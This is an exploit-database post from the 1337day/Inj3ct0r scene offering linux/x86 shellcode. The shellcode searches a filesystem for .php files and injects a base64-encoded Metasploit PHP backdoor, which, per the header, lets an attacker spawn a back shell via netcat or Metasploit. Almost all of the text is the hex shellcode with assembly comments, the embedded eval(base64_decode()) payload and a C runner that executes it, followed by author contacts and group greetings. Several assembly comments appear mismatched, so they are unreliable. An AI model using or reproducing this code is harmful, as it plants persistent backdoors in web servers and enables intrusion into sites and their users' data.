1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : 1337day.com 0 1 [+] Support e-mail : submit[at]1337day.com 1 0 0 1 ######################################### 1 0 I'm KedAns-Dz member from Inj3ct0r Team 1 1 ######################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 /* ### # Title : linux/x86 Search (*.php) and Inject PHP_BACKD00R exploit/shellcode # Author : KedAns-Dz # E-mail : ked-h@hotmail.com (ked-h@1337day.com) | ked-h@exploit-id.com | kedans@facebook.com # Home : Hassi.Messaoud (30500) - Algeria -(00213555248701) # Web Site : www.1337day.com # Facebook : http://facebook.com/KedAns # platform : linux/x86 # Type : shellcode / local exploit # Size : 380 bytes + Payload 204 bytes # Inf0 : afTer Inj3ct PHP backd00r Open any .php File ex:(index.php) and spawn BackShell via (NC/MSF) ### ## # | >> --------+++=[ Dz Offenders Cr3w ]=+++-------- << | # | > Indoushka * KedAns-Dz * Caddy-Dz * Kalashinkov3 | # | Jago-dz * Over-X * Kha&miX * Ev!LsCr!pT_Dz * Dr.55h | # | KinG Of PiraTeS * The g0bl!n * soucha * dr.R!dE .. | # | ------------------------------------------------- < | ### */ // Reference : http://1337day.com/exploits/17392 * by rigan #include char shellcode[] = "\x31\xc0" // xor %eax,%eax "\x50" // push %eax "\x83\xec\x01" // sub %esp,$0x1 "\xc6\x04\x24\x2f" // mov byte %esp, $0x2f "\x89\xe3" // mov %ebx,%esp "\xb0\x0c" // mov %al,$0x0c "\xcd\x80" // int $0x80 "\x31\xc0" // xor %eax,%eax "\x50" // push %eax "\x83\xec\x01" // sub %esp,$0x01 "\xc6\x04\x24\x2e" // mov %esp, $0x2e "\xeb\x02" // jmp short .me "\xeb\x63" // jmp short .me "\xe8\xf9\xff\xff\xff" // call .str - exit(0) "\x31\xc0" // xor %eax,%eax "\x31\xdb" // xor %ebx,%ebx "\xb0\x01" // mov %al,$0x01 "\xcd\x80" // int $0x80 "\x31\xc0" // xor %eax,%eax "\x89\xfb" // mov %ebx,%edi "\x31\xc9" // xor %ecx,%ecx "\xb1\x02" // mov %cl,$0x02 "\xb0\x05" // mov %al,$0x05 "\xcd\x80" // int $0x80 "\x31\xdb" // xor %ebx,%ebx "\x89\xc3" // mov %ebx,%eax "\x31\xc9" // xor %ecx,%ecx "\x31\xc0" // xor %eax,%eax "\x99" // cdq "\xb2\x02" // mov %dl,$0x02 "\xb0\x13" // mov %al,$0x13 "\xcd\x80" // int $0x80 "\x31\xc0" // xor %eax,%eax "\x89\xf1" // mov %ecx,%esi "\xb2\x32\x30\x34" // mov %dl,$0x343032 [ Backd00r S!zE = 204 bytes ] "\xb0\x04" // mov %al,$0x04 "\xcd\x80" // int $0x80 "\x31\xc0" // xor %eax,%eax "\xb0\x06" // mov %al,$0x06 "\xcd\x80" // int $0x80 "\xc3" // retn "\x31\xc0" // xor %eax,%eax "\x31\xdb" // xor %ebx,%ebx "\x31\xc9" // xor %ecx,%ecx "\x99" // cdq "\x42" // inc %edx "\x8a\x1c\x17" // mov %bl, %edi, %edx "\x84\xdb" // test %bl, %bl "\x74\x1a" // je short .me "\x3a\x1e" // cmp %bl, %esi "\x75\xf4" // jnz short .me "\x8a\x04\x0e" // mov %al, %esi, %ecx "\x8a\x1c\x17" // mov %bl, %edi, %edx "\x84\xc0" // test %al, %al "\x74\x08" // je short .me "\x41" // inc %ecx "\x42" // inc %edx "\x38\xc3" // cmp %bl, %al "\x74\xf0" // je short .me "\xeb\x04" // jmp short .me "\x31\xc0" // xor %eax,%eax "\xb0\x02" // mov %al,$0x02 "\xc3" // retn "\x55" // push %ebp "\x89\xe5" // mov %ebp,%esp "\xb0\xfa" // mov %al,$0xfa "\x29\xc4" // sub %esp,%eax "\x31\xc0" // xor %eax,%eax "\x31\xc9" // xor %ecx,%ecx "\x8d\x5d\x08" // lea %ebx,dword %ebp ,$0x08 "\xb0\x05" // mov %al,$0x05 "\xcd\x80" // int $0x80 "\x85\xc0" // test %eax,%eax "\x78\x22" // js short .me "\x89\x45\x0c" // mov dword %ebp $0x0c,%eax "\x8b\x75\x0c" // mov esi,dword %ebp $0x0c "\x89\xf3" // mov %ebx,%esi "\x31\xc0" // xor %eax,%eax "\x31\xc9" // xor %ecx,%ecx "\x8d\x4c\x24\x64" // lea %ecx,dword %esp $0x64 "\xb0\x59" // mov %al,$0x59 "\xcd\x80" // int $0x80 "\x85\xc0" // test %eax,%eax "\x75\x19" // jnz short .me "\x31\xc0" // xor %eax,%eax "\x31\xdb" // xor %ebx,%ebx "\x89\xf3" // mov %ebx,%esi "\xb0\x06" // mov %al,$0x06 "\xcd\x80" // int $0x80 "\x31\xc0" // xor %eax,%eax "\x50" // push %eax "\x66\x68\x2e\x2e" // push $0x2e2e "\x89\xe3" // mov %ebx,%esp "\xb0\x0c" // mov %al,$0x0c "\xcd\x80" // int $0x80 "\xc9" // leave "\xc3" // retn "\x8d\x54\x24\x6e" // lea %edx,dword %esp $0x6e "\x81\x3a\x70\x72\x6f\x63" // cmp dword %edx,$0x636f7270 "\x74\xc6" // je short .me "\x80\x3a\x2e" // cmp %edx, $0x2e "\x75\x05" // jnz short .me "\xe9\xbc\xff\xff\xff" // jmp .str "\x89\xd3" // mov %ebx,%edx "\x89\xe1" // mov %ecx,%esp "\x31\xc0" // xor %eax,%eax "\xb0\xc4" // mov %al,$0xc4 "\xcd\x80" // int $0x80 "\x66\xb9\xff\xef" // mov %cx,$0xefff "\x66\xbb\xff\x9f" // mov %bx,$0x9fff "\x41" // inc %ecx "\x43" // inc %ebx "\x8b\x44\x24\x10" // mov %eax,dword %esp $0x10 "\x66\x21\xc8" // and %ax,%cx "\x66\x39\xd8" // cmp %ax,%bx "\x75\x05" // jnz short .me "\xe9\x97" // jmp .me "\xff\xff\xff" // . "\x31\xc0" // xor %eax,%eax "\x50" // push %eax "\x83\xec\xec" // sub %esp,$0x14 "\x01\xc6" // add %esi,%eax "\x04\x24" // add %al,$0x24 "\x2e\x89\xd3" // mov %ebx,%edx "\xb0\x0c" // mov %al,$0x0c "\xcd\x80" // int $0x80 "\x85\xc0" // test %eax,%eax "\x75\x0a" // jnz short .me "\xe8\x65\xff\xff\xff" // call .str "\xe9\x79\xff\xff\xff" // jmp .str "\x31\xc0" // xor %eax,%eax "\x89\xd3" // mov %ebx,%edx "\x31\xc9" // xor %ecx,%ecx "\xb1\x02" // mov %cl,$0x02 "\xb0\x21" // mov %al,$0x21 "\xcd\x80" // int $0x80 "\x85\xc0" // test %eax,%eax "\x74\x05" // je short .me "\xe9\x64\xff\xff\xff" // jmp .str "\x3c\x02" // cmp %al,$0x02 "\x74\x18" // je short .me "\x31\xc0" // xor %eax,%eax "\x50" // push %eax "\x68\x2e\x70\x68\x70" // push $0x7068702e "\x89\xe6" // mov %esi,%esp "\xe8\xf6\xfe\xff\xff" // call .str "\x3c\x02" // cmp %al,$0x02 "\x74\x05" // je short .me "\xe9\x30\xff\xff\xff" // jmp .str "\xeb\x0b" // jmp short .me "\x5e" // pop %esi "\xe8\xb9\xfe\xff\xff" // call .str "\xe9\x23\xff\xff\xff" // jmp .str "\xe8\xf0\xff\xff\xff" // call .str /* PHP Backd00r - Payload by MSF | enc=Base64 =>*/ "\x65\x76\x61\x6c\x28\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63" "\x6f\x64\x65\x28\x4d\x63\x6b\x78\x32\x2e\x63\x68\x72\x28\x34" "\x37\x29\x2e\x66\x6a\x73\x4b\x54\x4e\x67\x44\x48\x4a\x4d\x64" "\x74\x71\x52\x6c\x6a\x4e\x67\x44\x48\x62\x61\x68\x64\x59\x7a" "\x59\x41\x78\x32\x2e\x63\x68\x72\x28\x34\x37\x29\x2e\x66\x6a" "\x55\x30\x4e\x54\x61\x67\x4b\x4a\x34\x62\x42\x6d\x7a\x59\x42" "\x62\x58\x6d\x68\x2e\x63\x68\x72\x28\x34\x37\x29\x2e\x41\x41" "\x41\x42\x5a\x6d\x67\x52\x58\x47\x5a\x54\x61\x68\x42\x52\x55" "\x49\x6e\x68\x51\x32\x70\x6d\x57\x4d\x32\x41\x57\x59\x66\x5a" "\x73\x44\x2e\x63\x68\x72\x28\x34\x37\x29\x2e\x4e\x67\x45\x6c" "\x35\x2e\x63\x68\x72\x28\x34\x33\x29\x2e\x56\x42\x6f\x4c\x79" "\x39\x7a\x61\x47\x67\x76\x59\x6d\x6c\x75\x69\x65\x4e\x51\x55" "\x34\x6e\x68\x73\x41\x76\x4e\x67\x41\x29\x29\x3b" /* End payload ...*/ "\x3c\x68" // cmp %al,$0x68 "\x74\x6d" // je short .me "\x6c" // ins %edi,%dx "\x3e\x3c\x73" // cmp %al,$0x73 "\x63\x72\x69" // arpl word %edx $0x69,%si "\x70\x74" // jo short .me "\x3e\x61" // popad "\x6c" // ins %edi,%dx "\x65\x72\x74" // jb short .me "\x28\x22" // sub %edx,%ah "\x70\x77" // jo short .me "\x6e" // outs %dx,%edi "\x33\x64\x22\x29" // xor %esp,dword %edx $0x29 "\x3c\x73" // cmp %al,$0x73 "\x63\x72\x69" // arpl word %edx $0x69,%si "\x70\x74" // jo short .me "\x3e\x3c\x2f" // cmp %al,$0x2f "\x68\x74\x6d\x6c\x3e"; // push $0x3e6c6d74 int main() { printf("%d\n", strlen(shellcode)); (*(void (*)()) shellcode)(); return 0; } #================[ Exploited By KedAns-Dz * Inj3ct0r Team * ]===================================== # Greets To : Dz Offenders Cr3w < Algerians HaCkerS > || Rizky Ariestiyansyah * Islam Caddy # + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re * CrosS (www.1337day.com) # Inj3ct0r Members 31337 : Indoushka * KnocKout * Kalashinkov3 * SeeMe * ZoRLu * anT!-Tr0J4n # Anjel Injection (www.1337day.com/team) * Dz Offenders Cr3w * Algerian Cyber Army * Sec4ever # Exploit-ID Team : jos_ali_joe + Caddy-Dz + kaMtiEz + r3m1ck (exploit-id.com) * Jago-dz * Over-X # Kha&miX * Str0ke * JF * Ev!LsCr!pT_Dz * KinG Of PiraTeS * www.packetstormsecurity.org * TreX # www.metasploit.com * UE-Team & I-BackTrack * r00tw0rm.com * All Security and Exploits Webs .. #=================================================================================================